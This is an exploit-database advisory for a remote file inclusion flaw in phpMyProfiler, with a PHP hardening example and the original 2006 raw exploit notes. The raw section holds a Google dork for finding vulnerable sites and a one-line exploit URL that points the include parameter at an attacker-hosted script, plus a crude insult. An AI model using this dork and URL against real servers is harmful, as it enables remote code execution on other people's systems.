Vendor: phpMyProfiler
By: mozi2weed@yahoo.com mozi
CVSS: 9.3 (HIGH)
CWE: 98 (Remote File Inclusion)
Product Name: phpMyProfiler
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpMyProfiler Remote File Inclusion Vulnerability

A remote file inclusion vulnerability exists in phpMyProfiler, due to the application including files based on user input without proper validation. An attacker can exploit this vulnerability to include arbitrary remote files, allowing for the execution of arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.
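
A hardened form of the `require_once` line quoted in the raw data further down, as an added example that is not phpMyProfiler's code or the advisory author's. `PMP_BASE` and `pmp_safe_path()` are hypothetical names, the sample inputs are constructed, and the way `$pmp_rel_path` becomes request-controlled is an assumption noted in the comments.

```php
<?php
// Added example, not phpMyProfiler code. PMP_BASE and pmp_safe_path() are
// hypothetical names; the sample inputs are constructed.

// Pattern quoted in the advisory (shown as a comment only):
//   require_once($pmp_rel_path . '/include/PEAR/HTTP.php');
// Assumption: $pmp_rel_path is not set by the script before this line, so a
// request parameter of the same name can supply it (e.g. register_globals).

// Fix 1: take the base directory from the file's own location, never from
// the request.
define('PMP_BASE', realpath(dirname(__FILE__)));

// Fix 2: when a path fragment does vary, resolve it and check containment.
// Returns the absolute path, or false if the target must not be included.
function pmp_safe_path($relative)
{
    // Refuse non-strings and any scheme / stream-wrapper prefix
    // (http://, ftp://, php://, data:, ...).
    if (!is_string($relative) || preg_match('#^[a-z][a-z0-9+.-]*:#i', $relative)) {
        return false;
    }
    // realpath() collapses "../" and returns false when the file is missing.
    $full = realpath(PMP_BASE . DIRECTORY_SEPARATOR . $relative);
    if ($full === false) {
        return false;
    }
    // The resolved file must sit below PMP_BASE.
    $prefix = rtrim(PMP_BASE, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : false;
}

// Constructed inputs: the library path (accepted only if that file exists
// under PMP_BASE), a remote URL, and a traversal attempt.
$samples = array(
    'include/PEAR/HTTP.php',
    'http://example.invalid/remote.txt',
    '../../../../etc/passwd',
);
foreach ($samples as $s) {
    $path = pmp_safe_path($s);
    // In the application: if ($path !== false) { require_once $path; }
    echo str_pad($s, 36), ' => ', ($path === false ? 'rejected' : $path), "\n";
}
```

Setting `allow_url_include = Off` in php.ini (and `register_globals = Off` on PHP versions that still have it) is a second layer that does not depend on the application code.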

Exploit-DB raw data:

# Author: mozi2weed@yahoo.com mozi
# phpMyProfiler Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
------------------------------------------------------------------
Download: http://sourceforge.net/projects/phpmyprofiler
------------------------------------------------------------------
require_once($pmp_rel_path . '/include/PEAR/HTTP.php');
_________________________________________________________________
googledork:phpMyProfiler

http://site.com/[path]/functions.php?pmp_rel_path=http://[Evil_script]
PS: Those whitehats on undernet suck dick!!! Disgusting lamers
#phpfreaks rulz
# heh tnx

# milw0rm.com [2006-10-03]